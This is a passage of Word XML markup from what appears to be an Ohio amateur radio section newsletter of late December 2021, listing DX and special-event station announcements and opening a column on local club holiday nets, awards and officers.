        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SENEGAL, 6W.  Jacques, F6HMJ will be QRV as 6W7/F6HMJ from December</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>29 to February 22, 2022.  Activity will be on 40 to 10 meters using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CW and SSB.  QSL to home call.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MALDIVES, 8Q.  Tom, OE1TRI will be QRV as 8Q7TR from South Ari</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Atoll, IOTA AS-013, from December 28 to January 3, 2022.  Activity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>will be holiday style on 80, 40, 20, 15, and 10 meters using SSB and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>FT8.  QSL to home call.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>FEDERAL REPUBLIC OF GERMANY, DA.  Stations DL0DIX, DK0GER, and DM5G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>are QRV until the end of 2021 to commemorate the 130th birthday of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>the painter and printmaker Otto Dix.  QSL via bureau.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">ENGLAND, G.  Members of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Denby</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dale Amateur Radio Society will be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>QRV with special calls  GB0HNY, GB1HNY, GB2HNY, GB4HNY, GB5HNY,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>GB6HNY, GB8HNY, and GB9HNY from December 28 to January 24, 2022, to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>celebrate the New Year 2022.  QSL via operators' instructions.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JAPAN, JA.  Take, JI3DST will be QRV as JI3DST/6, JJ5RBH/6 and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">JS6RRR/6 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Tanega</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Island, IOTA AS-032, from December 25 to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>January 10, 2022.  Activity will be on 80 to 2 meters using CW, SSB,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RTTY, FM, FT8 and FT4.  QSL to home call.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>OGASAWARA ISLANDS, JD1.  Harry, JG7PSJ is QRV as JD1BMH from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Chichijima</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, IOTA AS-031, until January 1, 2022.  Activity is on 80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>to 10 meters using CW, SSB and RTTY.  QSL to home call.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>BELGIUM, ON.  Look for 64 special event stations to use the ON75</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>prefix from January 1 to February 28, 2022, to celebrate the 75</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>anniversary of the establishment of Belgium's National IARU Society.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>QSL via operators' instructions.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>NETHERLANDS, PA.  Friso, PF1B is QRV with special event callsign</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>PF33MAX until January 17, 2022, to celebrate Max Verstappen's World</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Champion title.  Activity is on 160 meters to 70 centimeters using</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>mostly FT8 and FT4.  QSL via bureau,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>EUROPEAN RUSSIA, UA.  Special event stations R2022NY, R22HNY,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RA22NY, RG22NY, RJ22NY, RK22NY, RL22NY, RM22NY, RO22NY, RQ22NY,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RT22NY, RW22NY, RX22NY, and RY22NY will be QRV from December 25 to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>January 14, 2022, for the Russian New Year 2022 radio marathon.  QSL</w:t>
      </w:r>
      <w:r w:rsidR="001170F5">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>via RQ7L.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ST. KITTS AND NEVIS, V4.  Victor, WB0AA is QRV as V4/WB0AA from St.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Kitts, IOTA NA-104, until December 29.  Activity is on 160 to 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>meters using CW and SSB.  QSL to home call.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">INDONESIA, YB.  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Agus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, YB1TDL is QRV as YB1TDL/8 from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Karakelong</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Island, Talaud Islands, IOTA OC-209, until December 29.  Activity is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>on various HF bands using SSB and FT8.  QSL via HA3JB.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MACEDONIA, Z3.  Michael, DF8AN will be QRV as Z38/DF8AN from Skopje</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>from December 29 to January 5, 2022.  QSL via operator's</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>instructions.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F02511">
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="25996D6E" w14:textId="0A07ED74" w:rsidR="00EA3F06" w:rsidRDefault="00EA3F06" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D2D4278" w14:textId="2F4312DB" w:rsidR="00EA3F06" w:rsidRDefault="00EA3F06" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>__________________________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7E6A07" w14:textId="0A77282F" w:rsidR="00EA3F06" w:rsidRDefault="00EA3F06" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="184D3D43" w14:textId="580DEB36" w:rsidR="0001665F" w:rsidRDefault="0001665F" w:rsidP="00BE7112">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7530B856" w14:textId="77777777" w:rsidR="00F02511" w:rsidRDefault="00F02511" w:rsidP="00F02511">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="144"/>
          <w:szCs w:val="144"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C43789">
        <w:rPr>
          <w:b/>
          <w:sz w:val="144"/>
          <w:szCs w:val="144"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="32" w:name="South40"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidRPr="00C43789">
        <w:rPr>
          <w:b/>
          <w:sz w:val="144"/>
          <w:szCs w:val="144"/>
        </w:rPr>
        <w:t>OHIO’S</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46CDA718" wp14:editId="5A902559">
            <wp:extent cx="754380" cy="754380"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="20" name="Picture 20"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text, clipart&#10;&#10;Description automatically generated"/>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754380" cy="754380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="691CAFE7" w14:textId="77777777" w:rsidR="00F02511" w:rsidRDefault="00F02511" w:rsidP="00F02511">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C952A15" w14:textId="77777777" w:rsidR="00F02511" w:rsidRDefault="00F02511" w:rsidP="00F02511">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">By now the packages have been unwrapped and we’re hoping everyone had a nice Christmas and was able to share it with family and friends.  Here’s also hoping some of those presents Santa left under the tree had some ham radio goodies in them or at least a gift card or funds to buy that new whiz bang radio or accessory you desire. As the remaining days and ham radio events in 2021 are really numbered and this being the last Section Journal for the year, there are a few things to share concerning things happening before the next edition.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517C1017" w14:textId="77777777" w:rsidR="00F02511" w:rsidRDefault="00F02511" w:rsidP="00F02511">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F821F7E" w14:textId="77777777" w:rsidR="00F02511" w:rsidRDefault="00F02511" w:rsidP="00F02511">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00B2106D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Highland ARA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’s traditional New Year’s Net will start following the broadcast of the New Year being rung in by the clanging of the large bell gracing the front of the Highland County Historical Society.  Those bell tones will be broadcast over the Club’s 147.21 (100 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) and 146.685 (118.8 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) repeaters at the stroke of midnight.  All amateurs within the sound of the repeaters are welcome to check into the net, but please stagger the check-ins so everyone can be acknowledged.  Those who hear the net, but are unable to access either repeater may check in via with an email to </w:t>
      </w:r>
      <w:hyperlink r:id="rId183" w:history="1">
        <w:r w:rsidRPr="000A4217">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>highlandara@gmail.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.  The 2021 net had approximately 20+ participate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFEF625" w14:textId="77777777" w:rsidR="00F02511" w:rsidRDefault="00F02511" w:rsidP="00F02511">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1935CD53" w14:textId="77777777" w:rsidR="00F02511" w:rsidRDefault="00F02511" w:rsidP="00F02511">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="009A2835">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Athens County ARA</w:t>
      </w:r>
      <w:r>
        <w:t>’s Annual Holiday Dinner was held on the 21</w:t>
      </w:r>
      <w:r w:rsidRPr="009A2835">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in Athens.  A highlight of the evening’s festivities was when Club President Eric McFadden, WD8RIF, announced the 2021 winner of the Club’s NC8V Memorial Trophy as Paul Schulz, WD8SCV.  The award goes to the person achieving the highest score during the annual ARRL 10 Meter Contest.  Schulz made 67 contacts and had 16 multipliers to lead the other ACARA members participating in the contest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4012A180" w14:textId="77777777" w:rsidR="00F02511" w:rsidRDefault="00F02511" w:rsidP="00F02511">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25CA75C2" w14:textId="77777777" w:rsidR="00F02511" w:rsidRDefault="00F02511" w:rsidP="00F02511">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Last time we announced the </w:t>
      </w:r>
      <w:r w:rsidRPr="0070271A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Clinton County ARA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’s President’s gavel will be passed to Mark Atwell, KD8DGH, in 2022.  Thanks to Mike Boyle, WF8B, we learn the additional club officers are Steve Lamb, W8SBL, VP; Sara Lamb, KS8P, Secretary and Andrew Adrian, W9AMA, Treasurer.  Directors will be Bill Schell, WD8BHV; Paul </w:t>
      </w:r>
